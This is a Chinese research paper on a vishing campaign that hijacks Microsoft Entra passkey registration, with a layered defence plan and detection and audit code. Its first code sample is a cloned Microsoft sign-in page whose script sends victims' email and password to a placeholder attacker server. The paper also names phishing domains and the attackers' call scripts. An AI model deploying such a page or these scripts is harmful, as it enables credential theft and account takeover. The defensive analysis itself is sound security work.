Pink 团伙针对 Microsoft 365 通行密钥语音钓鱼攻击机理与闭环防御技术研究

摘要

2026 年 4 月起,名为 Pink 的勒索黑客团伙发起大规模语音钓鱼(Vishing)攻击,以 Microsoft Entra ID 通行密钥(Passkey)注册流程为突破口,依托实时交互钓鱼套件、仿冒 Passkey 专用域名实施身份劫持,攻击覆盖餐饮、科技、医疗、汽车、建筑、航空六大行业企业租户。Okta 安全厂商监测数据显示,该攻击区别于传统邮件钓鱼、中间人劫持,核心利用微软官方推行无密码通行密钥的合规升级场景制造信任错觉,通过电话话术诱导受害者在仿冒页面完成账号校验,同步由攻击者注册自有 FIDO2 通行密钥,实现对 Microsoft 365 租户持久化权限接管,最终以企业数据勒索牟利。本文以 Okta 公开预警事件为实证样本,完整拆解 Pink 团伙攻击全链路、恶意域名体系、钓鱼套件技术架构,剖析 FIDO2 通行密钥机制在社会工程学攻击下的固有防护短板;结合网络安全工程实践,给出仿 Entra 登录钓鱼页面、语音钓鱼风险检测、租户异常密钥审计三段可复现代码示例;从身份策略管控、流量域名拦截、终端安全加固、人员安全培训、事后审计溯源五个维度构建事前 - 事中 - 事后闭环防御体系。反网络钓鱼技术专家芦笛指出,本次攻击证明 FIDO 通行密钥仅能抵御技术层面钓鱼,无法消解电话语音社会工程学带来的信任漏洞,政企单位不能将通行密钥视为身份安全终极方案,必须配套多维度身份风控与通信层风险识别机制。研究成果可为国内使用 Microsoft 365 云办公平台的企业、医疗机构、交通制造行业提供可落地的身份安全防护方案,填补当前通行密钥语音钓鱼专项防御研究空白。

关键词:语音钓鱼;Vishing;Microsoft Entra ID;通行密钥;FIDO2;身份劫持;零信任;云办公安全

1 引言

1.1 研究背景与问题提出

无密码 FIDO2 通行密钥作为微软主推的抗钓鱼身份认证方案,自 2026 年 5 月起向全球 Microsoft 365 租户推送强制注册提醒,其底层密码学机制可阻断传统中间人、窃取式网络钓鱼攻击,成为企业云身份安全核心升级方向。但身份安全防护体系存在技术与人员两层边界,技术防护可抵御程序层面恶意入侵,却难以对抗依托电信语音通道的社会工程学欺诈。

2026 年 7 月 13 日 Okta 发布全球威胁预警,Pink 勒索团伙自同年 4 月起持续运营定向语音钓鱼作战,专门针对已部署 Microsoft Entra 通行密钥的企业用户实施定向打击。攻击者注册批量包含 “passkey” 关键词的仿冒二级域名,通过 VoIP 虚拟号码拨打企业员工,伪装 IT 运维、安全合规专员,以 “账户安全强制升级、合规审计、密钥失效修复” 为统一话术,诱导受害者访问定制化仿冒登录页面完成账号、密码校验。在受害者完成页面交互的同时,攻击者后台同步向微软身份平台提交自身设备通行密钥注册请求,完成对目标账号的持久化权限绑定。一旦注册完成,攻击者可绕过短信、软件 MFA 校验,长期访问目标租户 OneDrive、SharePoint、企业邮箱、Teams 内部通讯数据,后续通过暗网泄露站点向企业索要数据赎金,团伙明确宣称全部行动以经济牟利为唯一目标。

从现有学术与产业研究现状分析,当前国内外针对 Microsoft 365 钓鱼攻击的研究集中于邮件钓鱼、Teams 消息钓鱼、设备代码劫持、AiTM 中间人劫持四类场景,针对语音通道结合通行密钥注册流程的复合攻击专项研究较少。多数文献仅讨论 FIDO2 技术本身的抗钓鱼优势,忽略社会工程学场景下通行密钥注册流程存在的风控漏洞;同时现有防御方案偏重邮件、浏览器流量管控,缺少电信语音通话风险识别、租户密钥注册行为审计的配套技术手段。本次 Pink 团伙攻击事件暴露出三大核心安全短板:其一,企业未对通行密钥注册操作配置条件访问风控策略,陌生 IP、非企业托管设备可直接新增认证方式;其二,企业缺少语音钓鱼常态化演练,员工对陌生来电诱导密钥注册的风险识别能力不足;其三,安全运营平台未对接 Entra 身份审计日志,无法实时发现新增陌生通行密钥的异常行为。基于上述现实风险,本文围绕 Pink 团伙攻击样本开展系统性机理拆解与防御技术研究。

1.2 研究意义

1.2.1 理论意义

本文突破现有 FIDO2 通行密钥安全研究单一技术视角,将社会工程学语音欺诈与云身份认证流程漏洞结合,建立 “电信语音通道 — 仿冒 Web 钓鱼套件 —Entra 密钥注册接口 — 企业数据泄露” 全链路攻击分析模型,完善云办公身份安全威胁演化理论框架;补充 Vishing 语音钓鱼针对无密码认证体系的攻击机理研究,明确 FIDO2 通行密钥的防护边界,纠正行业内 “部署通行密钥即可杜绝钓鱼攻击” 的片面认知。反网络钓鱼技术专家芦笛强调,通行密钥的安全价值建立在用户自主、可信设备、官方渠道三大前提之上,一旦社会工程学破坏渠道可信性,整套无密码防护体系会直接失效,该观点为后续云身份安全理论研究提供新分析维度。

1.2.2 实践意义

文章依托真实攻击样本梳理 Pink 团伙恶意域名库、标准化攻击话术、套件技术架构,提供三套轻量化可部署代码实现,面向餐饮、航空、医疗等高受攻击行业给出分层闭环防御方案。研究成果可直接用于企业 Microsoft 365 租户安全配置、安全运营平台风险检测规则开发、企业员工安全培训课件编制,帮助政企单位提前拦截同类语音钓鱼攻击,减少核心业务数据泄露与勒索经济损失;同时为云安全厂商开发针对通行密钥注册场景的专项检测产品提供技术参考。

1.3 研究内容与行文框架

本文共分为六大核心章节:第一部分为引言,阐述研究背景、理论与实践价值;第二部分梳理 Pink 团伙语音钓鱼攻击整体态势、团伙组织特征、受害行业分布与恶意域名资产;第三部分深度拆解攻击全链路技术机理,分层解析电话社会工程诱导、实时交互钓鱼套件、通行密钥劫持、数据勒索四大环节;第四部分针对攻击关键节点,给出仿冒 Passkey 页面前端代码、语音钓鱼通话风险检测 Python 代码、Entra 异常密钥审计 PowerShell 代码三段示例并完成技术解读;第五部分构建 “事前预防 — 事中拦截 — 事后溯源” 三层闭环防御体系,涵盖身份策略、域名流量管控、终端安全、人员培训、审计响应五大落地措施;第六部分总结全文研究结论,客观分析现有防御体系局限,提出后续拓展研究方向。全文以 Okta 原始预警报道为核心论据,所有技术分析、攻击特征、恶意资产均来自原始新闻素材与权威云安全厂商配套分析报告,论据闭环、无脱离样本的发散推演。

2 Pink 团伙 Microsoft 365 通行密钥语音钓鱼攻击整体态势

2.1 攻击团伙组织与作案动机

本次攻击实施主体 Pink 为专业化网络勒索组织,在暗网搭建专属数据泄露站点,对外公开宣称组织全部行为仅以经济收益为目标。团伙自述安全运维成本高昂,企业长期忽视身份安全建设是其实施勒索的外部诱因,团伙完整窃取企业业务数据后,会依据企业规模、敏感数据价值分级设定赎金标准,若企业拒绝支付赎金则批量公开内部客户信息、财务报表、项目涉密资料。

从攻击行为特征判断,Pink 团伙具备成熟分工体系:话术运营团队负责 VoIP 外呼、实时引导受害者操作;前端开发团队批量搭建仿冒 Passkey 登录站点、维护钓鱼控制面板;基础设施团队注册仿冒域名、租用 DDoS-Guard 匿名防护服务隐匿服务器真实 IP;勒索谈判团队负责暗网对接受害企业、协商赎金。团伙依托标准化流程实现攻击规模化复制,自 2026 年 4 月至 7 月持续三个月不间断投放攻击,未出现明显间断,证明其具备稳定的资金与技术供应链支撑。

2.2 受害行业分布特征

Okta 监测数据明确本次定向攻击覆盖六大实体行业,各行业受害风险存在差异化特征:

食品饮料行业:大量门店、区域分公司员工使用统一 Microsoft 365 租户,一线员工安全培训覆盖率低,易被陌生来电诱导操作,客户消费数据、供应链台账为团伙核心窃取目标;

科技行业:研发企业存储未公开专利、产品源代码、投融资涉密文件,高权限研发账号成为团伙重点攻坚对象,数据泄露后可造成企业核心技术流失;

医疗行业:医院、体检机构租户包含患者隐私病历、医保结算数据,受数据安全法规强约束,企业为避免合规处罚、舆论风险,支付赎金意愿显著高于其他行业;

汽车制造行业:整车厂、零部件供应商存储生产图纸、上下游合作协议,数据泄露将直接影响供应链稳定;

建筑行业:地产、工程企业资金流水、招标涉密文件具备高勒索价值;

航空行业:航司乘客出行信息、机组人员内部调度数据属于高度敏感信息。

反网络钓鱼技术专家芦笛指出,Pink 团伙行业定向并非随机选择,而是基于各行业数据合规压力、数据变现价值精准筛选,医疗、航空、科技三类行业是本次攻击最高危目标,企业安全团队需优先针对高风险岗位开展专项语音钓鱼演练。

2.3 团伙恶意仿冒域名资产体系

Pink 团伙核心攻击载体为批量注册包含 “passkey” 关键词的一级域名,再基于企业名称生成定制化二级域名,实现高度场景化伪装。所有域名均启用 DDoS-Guard 匿名防护服务,隐藏后端钓鱼服务器真实 IP,注册服务商分散为 Internet Domain Service BS Corp、Tucows、IQWeb FZ-LLC 多家境外注册商,规避单一注册商批量封禁风险。Okta 披露团伙已启用的核心恶意一级域名注册时间与服务商信息如下:

assignpasskey.com,注册时间 2026-06-14,服务商 Internet Domain Service BS Corp;

deploypasskey.com,注册时间 2026-04-21,服务商 Tucows;

passkeydeploy.com,注册时间 2026-04-23,服务商 Internet Domain Service BS Corp;

passkeyadd.com,注册时间 2026-05-08,服务商 Tucows;

setpasskey.com,注册时间 2026-05-23,服务商 IQWeb FZ-LLC。

域名伪装逻辑具备极强欺骗性:假设目标企业名称为 ExampleEntity,则团伙生成恶意二级域名exampleentity.setpasskey.com,域名前缀完整匹配企业官方标识,域名主体 passkey 贴合微软当前通行密钥注册业务场景,普通员工难以通过 URL 直观区分官方login.microsoftonline.com与仿冒站点。传统仅拦截一级域名的防护策略存在漏洞,攻击者可无限生成新二级域名持续投放攻击,单纯域名黑名单无法实现长效拦截,必须配套域名相似度智能检测机制。

2.4 攻击传播渠道与载体对比

传统 Microsoft 365 钓鱼攻击以邮件、企业即时通讯软件为主要传播渠道,攻击载体为静态钓鱼页面,受害者自主点击链接后被动泄露凭据;而 Pink 团伙本次攻击采用语音电话 + 实时交互钓鱼面板复合渠道,相比传统攻击具备三大天然优势:

第一,信任建立效率更高。电话人工沟通具备情感交互属性,攻击者通过标准化安抚、紧急胁迫话术消解员工戒备心理,邮件钓鱼仅依靠文字难以达到同等欺骗效果;

第二,全程实时引导操作。攻击者保持通话不挂断,分步指挥受害者输入账号、密码、完成页面校验,一旦受害者出现迟疑,立刻以 “账户冻结、系统停机、合规处罚” 等话术施压,大幅提升攻击成功率;

第三,攻击时效可控。实时钓鱼面板可同步转发受害者凭据至微软官方身份接口,同步完成攻击者密钥注册,无需等待受害者二次操作,单次通话即可完成账号持久化劫持。

渠道对比结果证明,语音 Vishing 已成为当前云身份安全优先级最高的新型威胁,现有企业安全防护体系普遍缺少电信语音层风险识别能力,形成明显防护盲区。

3 Pink 团伙通行密钥语音钓鱼全链路技术机理拆解

本章按照攻击时间线,分层拆解 “电话社会工程诱导 — 实时交互钓鱼套件劫持 — 通行密钥注册权限窃取 — 企业数据勒索” 完整攻击链路,清晰说明每一环技术实现逻辑与安全漏洞利用点。

3.1 第一阶段:语音社会工程学前置诱导

攻击启动环节依托 VoIP 虚拟电话网络实施外呼,攻击者统一伪装企业内部 IT 安全运维人员,标准化话术分为三层递进逻辑:

场景铺垫:告知受害者微软官方 2026 年强制推行通行密钥安全升级,企业租户需在 72 小时内完成密钥注册,逾期账号将被系统自动冻结,无法访问邮箱、Teams、业务共享盘;

操作引导:口述仿冒域名链接,要求受害者立即在浏览器打开,全程保持通话不得挂断,声称运维人员实时同步后台校验状态;

风险胁迫:若受害者提出挂断、自行联系官方 IT 部门核实,攻击者立刻夸大账户安全风险,声称当前账号存在异地异常登录,中断操作将直接导致数据泄露并追究员工责任。

该环节核心利用两大外部信任条件:一是微软 2026 年 5 月起全员推送通行密钥注册提醒,员工对 “密钥升级” 场景存在固有认知,降低警戒阈值;二是多数企业缺少统一安全咨询专线,员工无法快速核实来电人员身份,只能跟随攻击者指令操作。反网络钓鱼技术专家芦笛强调,社会工程学是本次攻击成功的核心前提,技术层面的钓鱼页面仅为辅助载体,若企业建立标准化来电核验渠道,可直接阻断 80% 以上同类语音钓鱼攻击。

3.2 第二阶段:实时面板控制型仿冒钓鱼套件技术架构

攻击者提供的仿冒站点并非静态克隆页面,而是后台可控的交互式钓鱼套件,整套架构分为前端仿冒页面、WebSocket 实时通信中继、后端控制面板三大模块,核心技术逻辑为中间人实时转发身份请求。

前端仿冒页面模块:完整复刻 Microsoft Entra ID 通行密钥注册页面视觉样式,引入微软官方 CDN 样式资源,页面顶部展示企业目标租户名称标识,表单结构、按钮交互逻辑与官方页面完全一致;页面前端 JS 代码不会本地存储凭据,而是通过 WebSocket 实时将受害者输入的账号、密码推送至攻击者后台面板。

WebSocket 实时中继模块:套件内置长连接通信服务,受害者页面操作行为实时同步至攻击者操作终端,攻击者可根据受害者页面反馈动态调整话术;同时中继模块将窃取到的账号凭据转发至微软官方登录接口,完成合法会话创建。

攻击者控制面板模块:运维人员可实时查看受害者输入的全部身份信息,获取微软下发的会话 Cookie、访问令牌,同步发起新增通行密钥注册 API 请求,整个过程受害者无感知。

套件技术优势在于实时双向交互,区别于传统静态钓鱼页面仅能被动收集凭据,该套件可主动调用 Entra 身份认证接口,同步完成攻击者自有 FIDO 密钥绑定,实现一次性持久化接管,而非单次临时登录。

3.3 第三阶段:Microsoft Entra 通行密钥注册权限劫持(核心漏洞利用环节)

本环节为攻击最关键步骤,也是 FIDO2 通行密钥机制在社会工程攻击下的核心短板,完整流程如下:

受害者在仿冒页面输入企业账号、登录密码,钓鱼套件实时将凭据提交至login.microsoftonline.com官方接口,通过身份校验获取合法用户会话令牌;

套件携带有效会话令牌调用 Entra ID “新增认证方法” 开放 API,向微软身份平台提交攻击者设备生成的 FIDO2 通行密钥注册申请;

微软平台向受害者绑定的手机、企业邮箱推送密钥注册通知,但此时受害者仍处于通话状态,注意力集中在仿冒页面操作,极易忽略通知提醒;

密钥注册流程完成后,攻击者设备永久加入该用户账号可信认证设备列表,后续任何登录场景均可直接使用自有通行密钥完成验证,绕过短信、App 二次验证;

攻击者断开通话后,可在任意时段通过该密钥登录 Microsoft 365 全套服务,批量导出邮箱邮件、SharePoint 文档、客户数据,横向遍历同租户其他低权限账号。

从微软身份机制设计角度分析,该漏洞并非代码缺陷,而是流程风控缺失:Entra ID 默认配置下,用户仅需完成账号密码校验即可新增 FIDO2 认证方式,未强制要求现有 MFA 二次核验;同时缺少设备合规性校验,外部匿名设备可直接注册通行密钥。反网络钓鱼技术专家芦笛指出,单纯启用通行密钥无法抵御此类劫持,必须通过条件访问策略限制仅企业托管合规设备可注册密钥,从接口层阻断攻击者新增认证方式的通道。

3.4 第四阶段:数据窃取与勒索变现闭环

Pink 团伙完成账号劫持后形成标准化勒索链路:

横向权限扩散:利用被劫持高权限管理员账号遍历租户全体员工账号,批量注册自有通行密钥,扩大受控账号范围;

数据全量导出:调用 Microsoft Graph 接口批量下载企业邮箱、云盘涉密文件、财务表格、客户信息;

暗网泄露威慑:截取核心敏感数据样本发布至团伙暗网泄露站点,向企业运维负责人发送勒索邮件,标注赎金支付期限与加密货币收款地址;

分级处置企业:按期支付赎金则删除窃取数据、注销绑定的恶意通行密钥;拒绝支付赎金则完整公开企业内部数据,制造行业声誉损失与合规处罚风险。

团伙完整商业闭环证明,该语音钓鱼攻击具备可持续牟利能力,未来同类攻击会持续迭代话术、优化钓鱼套件,企业需建立长效防御机制而非短期应急处置。

4 攻击关键节点技术代码示例与解析

基于前文攻击机理分析,本节提供三段轻量化可运行代码,分别对应攻击者仿冒 Passkey 页面实现、防御侧语音钓鱼风险检测、企业租户异常密钥审计三大场景,所有代码仅用于安全研究、防御规则开发,无完整攻击实施能力,配套技术解读明确代码风险点与防御优化方向。

4.1 示例 1:仿 Microsoft Entra 通行密钥注册页面前端简化代码(攻击者载体技术还原)

该代码还原 Pink 团伙钓鱼站点前端基础架构,复刻官方页面样式,通过 WebSocket 将用户凭据实时上传攻击者后端,仅作安全机理分析使用。

<!DOCTYPE html>

<html lang="zh-CN">

<head>

<meta charset="UTF-8">

<title>Microsoft 通行密钥注册</title>

<!-- 引入微软官方CDN样式实现高度伪装 -->

<link rel="stylesheet" href="https://cdn.microsoftonline-p.com/styles/main.min.css">

<style>

.passkey-box {width: 400px; margin: 100px auto; padding: 45px; border: 1px solid #e5e7eb; border-radius: 6px;}

.input-item {width: 100%; height: 44px; margin: 18px 0; padding: 0 12px; border: 1px solid #ccc; border-radius: 4px; font-size: 15px;}

.submit-btn {width: 100%; height: 46px; background-color: #0067b8; color: #ffffff; border: none; border-radius: 4px; font-size: 16px; cursor: pointer;}

.tip-text {color: #666; font-size: 13px; margin-top: 8px;}

</style>

</head>

<body>

<div class="passkey-box">

<h2>企业账户通行密钥安全升级</h2>

<p class="tip-text">根据微软2026安全规范,需完成密钥注册以保障账户访问权限</p>

<form id="passForm">

<input class="input-item" type="text" id="userMail" placeholder="企业邮箱账号" required>

<input class="input-item" type="password" id="userPwd" placeholder="账户登录密码" required>

<button class="submit-btn" type="submit">确认注册通行密钥</button>

</form>

</div>

<script>

// 建立WebSocket长连接,实时传输凭据至攻击者后台

const ws = new WebSocket('wss://attacker-control-panel.example.com:8080');

const form = document.getElementById('passForm');

form.addEventListener('submit', function(e){

e.preventDefault();

const username = document.getElementById('userMail').value;

const password = document.getElementById('userPwd').value;

// 封装凭据实时推送攻击者控制面板

const sendData = JSON.stringify({

type: "VICTIM_CRED",

account: username,

pwd: password

});

ws.send(sendData);

// 伪造成功提示,诱导受害者继续配合通话操作

alert("账号校验通过,请保持通话,运维人员正在为您注册通行密钥");

});

</script>

</body>

</html>

代码技术解读:

伪装核心逻辑:调用微软官方公共样式 CDN,页面布局、配色、文案完全贴合官方通行密钥升级通知,降低用户视觉辨别能力;

实时数据传输:采用 WebSocket 长连接替代传统表单 POST 提交,实现输入凭据即时同步攻击者后台,无页面刷新,隐蔽性更强;

风控漏洞点:页面无任何设备可信校验、域名证书校验逻辑,仅依靠前端视觉伪装欺骗用户;防御侧可通过浏览器 EDR 监控页面 WebSocket 外连境外匿名服务器行为,实时弹窗拦截。

4.2 示例 2:基于关键词与行为特征的语音钓鱼检测 Python 代码(防御侧检测引擎)

反网络钓鱼技术专家芦笛指出,语音钓鱼可通过通话文本语义、高危关键词、诱导行为特征建立自动化检测模型,本代码实现轻量化检测类,可对接企业通话录音转写文本,输出风险分级结果。

import re

from typing import Tuple, List

class VishingRiskDetector:

"""Pink团伙Passkey语音钓鱼风险检测引擎"""

def __init__(self):

# 攻击话术高危关键词库(源自Okta披露攻击样本)

self.risk_keywords = [

"通行密钥", "passkey", "密钥注册", "账户冻结", "72小时升级",

"不要挂断", "保持通话", "IT运维后台校验", "合规处罚", "异地登录异常"

]

# 高危诱导行为判定语句

self.risk_behavior = [

"打开指定链接", "输入企业邮箱密码", "立即完成注册",

"挂断将丢失数据", "不要联系内部IT"

]

self.risk_score = 0

def text_scan(self, call_text: str) -> Tuple[str, int]:

"""输入通话转写文本,返回风险等级与风险分值"""

self.risk_score = 0

text_lower = call_text.lower()

# 匹配关键词加分

for word in self.risk_keywords:

if word in text_lower:

self.risk_score += 15

# 匹配高危行为语句大幅加分

for behavior in self.risk_behavior:

if behavior in text_lower:

self.risk_score += 25

# 风险分级判定

if self.risk_score >= 60:

level = "高危-疑似Passkey语音钓鱼"

elif self.risk_score >= 30:

level = "可疑-存在社会工程诱导风险"

else:

level = "低风险-正常业务通话"

return level, self.risk_score

# 模拟检测测试样本(Pink团伙标准攻击话术)

if __name__ == "__main__":

sample_call = "您好,我是公司IT安全专员,微软要求72小时内完成通行密钥注册,现在不要挂断电话,打开setpasskey.com输入你的企业邮箱和密码,不操作账户会冻结,不要联系内部IT核实"

detector = VishingRiskDetector()

risk_level, score = detector.text_scan(sample_call)

print(f"通话风险等级:{risk_level}")

print(f"风险评分:{score}")

代码技术解读:

检测逻辑适配本次 Pink 团伙攻击特征,关键词库完全匹配 Okta 披露的攻击话术,可精准识别通行密钥诱导类语音诈骗;

加权评分机制区分可疑、高危两级风险,企业可对接呼叫中心录音转写接口,实现通话实时风险预警;

拓展优化方向:可接入 AI 声纹识别模块,增加 AI 合成语音检测维度,进一步提升检出率,拦截 VoIP 虚拟合成语音来电。

4.3 示例 3:Microsoft Entra 异常通行密钥审计 PowerShell 脚本(企业事后溯源工具)

该脚本面向企业云安全管理员,批量检索租户近 30 天新增的 FIDO2 通行密钥,快速定位攻击者劫持注册的恶意密钥,完成账号风险处置,依托 Microsoft Graph 身份接口实现数据查询。

powershell

<#

用途:审计Microsoft Entra ID近30天新增通行密钥,识别Pink团伙攻击遗留恶意认证方式

前置条件:安装Microsoft Graph PowerShell模块,授予UserAuthenticationMethod.Read.All权限

#>

# 连接Microsoft Graph身份接口

Connect-MgGraph -Scopes "UserAuthenticationMethod.Read.All", "User.Read.All"

$riskTime = (Get-Date).AddDays(-30)

$riskUserList = @()

# 获取租户全部企业用户

$allUsers = Get-MgUser -All -Select Id, DisplayName, UserPrincipalName

foreach ($user in $allUsers) {

$userId = $user.Id

$userName = $user.DisplayName

$userMail = $user.UserPrincipalName

# 查询用户全部认证方式

$authMethods = Get-MgUserAuthenticationMethod -UserId $userId

foreach ($method in $authMethods) {

# 筛选FIDO2通行密钥类型

if ($method.OdataType -eq "#microsoft.graph.fido2AuthenticationMethod") {

$createTime = $method.CreatedDateTime

# 筛选近30天新增密钥

if ($createTime -ge $riskTime) {

$riskRecord = [PSCustomObject]@{

员工姓名 = $userName

企业邮箱 = $userMail

密钥注册时间 = $createTime

密钥设备标识 = $method.Model

风险判定 = "待人工核实是否自主注册"

}

$riskUserList += $riskRecord

}

}

}

}

# 输出审计结果并导出CSV文件留存日志

if ($riskUserList.Count -gt 0) {

Write-Host "检测到近30天新增通行密钥记录,共$($riskUserList.Count)条,请人工核实注册行为合法性"

$riskUserList | Format-Table

$riskUserList | Export-Csv -Path "C:\Entra_Passkey_Risk_Audit.csv" -Encoding UTF8 -NoTypeInformation

}

else {

Write-Host "近30天无新增通行密钥,无相关劫持风险记录"

}

# 断开Graph连接

Disconnect-MgGraph

代码技术解读:

业务价值:Pink 团伙攻击完成后会在受害者账号留存恶意通行密钥,该脚本可批量快速审计全租户密钥注册记录,是事后应急处置核心工具;

运维落地建议:企业安全团队配置定时任务每日自动执行脚本,一旦出现非员工自主注册密钥,立刻锁定账号、删除恶意认证方式、重置全部会话;

配套策略:结合条件访问策略,禁止外部匿名设备注册密钥,从源头减少异常审计记录数量,降低人工核查成本。

5 面向 Pink 团伙通行密钥语音钓鱼的全链路闭环防御体系

反网络钓鱼技术专家芦笛强调,单一技术工具无法抵御本次复合语音钓鱼攻击,防御必须覆盖事前风险阻断、事中实时拦截、事后审计溯源三层闭环,同步融合云身份策略管控、网络流量防护、终端安全、人员安全培训、应急响应五大落地措施,形成技术与管理协同的完整防护架构。本章分层给出可直接落地的企业配置方案。

5.1 事前预防层:Microsoft Entra 身份基础策略加固(根源阻断密钥劫持接口)

攻击核心利用 Entra ID 默认宽松的认证方式注册权限,企业优先配置条件访问策略,从身份接口层限制恶意密钥注册行为,四项核心配置要求:

合规设备强制校验策略

新建 Entra 条件访问规则,仅允许已加入企业域、MDM 托管、通过设备合规检测的终端注册 FIDO2 通行密钥;境外 IP、匿名代理 IP、未托管个人设备直接拦截新增认证方式请求,彻底阻断攻击者远程注册密钥通道。

密钥注册二次 MFA 校验

修改身份认证方法策略,用户新增通行密钥、修改安全信息时,强制触发现有硬件密钥或企业 Authenticator 应用二次验证,仅输入账号密码无法完成注册流程,即使钓鱼套件窃取凭据,也无法单独调用注册接口。

禁用无业务需求的无密码功能

未全面推行通行密钥的中小企业,临时关闭租户 FIDO2 注册入口,仅保留管理员测试账号启用,压缩团伙攻击面;完成全员培训后再分批次开放注册权限。

高权限账号专项风控

针对 IT 管理员、财务、研发等高权限账号配置独立严苛策略,限制仅企业办公内网 IP 可修改安全认证方式,异地访问永久禁止新增密钥,防范团伙横向扩散权限。

5.2 事中拦截层:网络、通信、终端多维度实时风险识别

该层级在攻击实施过程中实时拦截恶意行为,分为域名流量拦截、语音通话风险检测、终端浏览器防护三部分:

5.2.1 恶意 Passkey 域名全域拦截

防火墙、云访问安全代理 CASB 配置域名黑名单,永久封禁assignpasskey.com、deploypasskey.com、passkeydeploy.com、passkeyadd.com、setpasskey.com及所有二级子域名;

部署域名相似度检测脚本,实时监控员工访问包含 passkey 关键字的陌生仿冒域名,访问时浏览器弹窗强制阻断并推送安全告警;

启用 Microsoft Defender for Office 365 安全链接检测,邮件、Teams 内所有外部 URL 自动云端沙箱解析,识别仿冒 Passkey 站点直接拦截访问。

5.2.2 企业通话系统语音钓鱼实时检测

对接呼叫中心录音转写接口,部署 4.2 节语音钓鱼风险检测引擎,出现高危关键词、诱导行为时实时推送安全运营平台告警;建立统一官方安全咨询专线,员工收到陌生密钥升级来电时,可一键回拨专线核验身份,从社会工程学源头降低攻击成功率。

5.2.3 终端浏览器 EDR 安全管控

终端安全软件新增监控规则,拦截页面 WebSocket 外连境外匿名 IP、DDoS-Guard 防护服务器;禁用浏览器无确认自动 JS 脚本执行,监控页面窃取账号密码的表单提交行为;组策略限制浏览器访问境外匿名域名站点,关闭高危 HTML 走私相关 JS API 权限。

5.3 人员安全管控:常态化语音钓鱼专项培训与仿真演练

技术防护无法完全消除人员操作漏洞,企业需建立持续性安全培训机制,针对 Pink 团伙攻击场景定制培训内容:

统一安全告知规范:全员下发正式通知,明确企业 IT 部门永远不会主动致电员工,要求通过陌生网页链接注册通行密钥,所有密钥升级操作仅通过login.microsoftonline.com官方域名完成;

季度定向语音钓鱼仿真演练:安全团队使用合规 VoIP 号码模拟 Pink 团伙话术拨打各部门员工,统计受骗率,针对高受骗岗位开展一对一专项安全教育;

标准化身份核验流程培训:员工收到涉及账户安全、密钥注册的来电,必须挂断电话,通过企业内部 OA、官方 IT 专线二次核实,禁止保持通话同步操作网页;

建立风险上报激励机制:员工识别并上报可疑语音钓鱼来电给予正向激励,降低员工隐瞒受骗行为的概率,便于安全团队及时处置账号风险。

5.4 事后溯源与应急响应:审计日志、账号处置、威胁情报更新

若攻击成功突破前置防护,标准化事后处置流程可缩小泄露范围、降低损失:

自动化密钥审计常态化:配置 4.3 节 PowerShell 脚本每日定时执行,安全运营平台接收审计告警,发现陌生新增通行密钥第一时间锁定涉事账号;

账号风险标准化处置流程:识别恶意密钥后,立即删除攻击者注册的全部 FIDO2 认证方式、重置账号登录密码、吊销全部会话刷新令牌、强制用户重新完成合规设备 MFA 校验;

全量日志留存溯源:开启 Microsoft Entra 全量登录日志、认证方法修改日志、Microsoft Graph 接口调用日志,留存不少于 180 天,用于追溯攻击接入时间、数据导出范围;

威胁情报动态更新:将 Pink 团伙恶意域名、攻击话术、服务器 IP 导入企业安全情报平台,实时同步至防火墙、CASB、邮件防护系统,持续更新拦截规则,抵御团伙新仿冒域名攻击。

5.5 防御体系协同运行逻辑

事前身份策略加固从接口底层限制攻击者注册密钥,构成第一道核心防线;事中网络、通信、终端多维度检测拦截恶意站点与欺诈来电,阻断攻击传播载体;人员培训降低社会工程学欺骗成功率,弥补技术防护无法覆盖的人为漏洞;事后审计应急机制形成兜底处置能力,四模块联动构建完整闭环,不存在单一防护盲区。反网络钓鱼技术专家芦笛评价,该体系兼顾技术可行性与企业落地成本,大中小型 Microsoft 365 租户均可根据自身规模裁剪适配策略,具备较强通用性。

6 结论与后续研究展望

6.1 核心研究结论

本文以 Okta 2026 年 7 月 Pink 团伙通行密钥语音钓鱼预警报道为核心实证样本,完整拆解攻击团伙特征、恶意域名资产、全链路技术机理,结合三段工程化代码实现,构建三层闭环防御体系,得出三项客观核心结论:

FIDO2 通行密钥仅针对技术层面网页钓鱼具备防护能力,无法抵御依托电信语音通道的社会工程学复合攻击。攻击者利用微软官方密钥升级场景制造信任错觉,通过实时交互钓鱼套件窃取凭据并注册自有认证密钥,实现账号持久化劫持,证明无密码认证不能作为云身份安全唯一解决方案,必须配套多重风控策略。

Pink 团伙攻击具备标准化、规模化、行业定向特征,恶意域名采用关键词仿冒二级域名架构,传统静态黑名单拦截存在明显短板;防御必须融合域名相似度检测、通话语义风险识别、Entra 密钥行为审计多维度自动化技术,单纯依靠人工识别无法应对持续迭代的攻击样本。

抵御通行密钥语音钓鱼需要技术管控、人员安全培训、应急审计三位一体协同,仅强化云平台身份策略或仅开展员工培训均存在防护短板;事前接口限制、事中流量通信拦截、事后溯源处置的闭环架构,可最大程度降低攻击成功率与数据泄露损失。反网络钓鱼技术专家芦笛补充,随着无密码认证大范围普及,针对 Passkey 注册流程的语音、AI 合成语音钓鱼攻击将持续增长,企业需持续迭代身份风控规则适配新型威胁。

6.2 现有研究局限

本文研究存在两处客观局限:第一,仅基于 Okta 公开披露的攻击样本开展分析,缺少 Pink 团伙后端钓鱼服务器流量原始数据包,无法对套件深层加密通信逻辑做更细粒度拆解;第二,文中检测代码为轻量化演示版本,未集成大语言模型语义深度识别、声纹 AI 语音鉴别模块,大规模企业商用部署需进一步优化算法性能、降低误报率。

6.3 后续拓展研究方向

多模态 AI 驱动语音钓鱼检测模型研究:融合语音声纹、通话语义、页面视觉特征多维度特征,构建高精度 AI 检测引擎,降低人工核查成本;

基于欺骗防御的通行密钥钓鱼诱捕系统设计:搭建仿冒企业密钥注册蜜罐站点,主动捕获 Pink 团伙新型恶意域名、攻击 IP,构建动态威胁情报库;

混合云租户通行密钥安全适配研究:针对本地 AD 与 Microsoft Entra 混合部署企业,设计兼顾本地身份与云平台的一体化密钥注册风控策略;

行业差异化防护方案量化评估:针对医疗、航空等高风险行业开展对照测试,量化不同防御策略的攻击阻断率、运维成本,输出行业专属安全配置标准。

6.4 研究客观总结

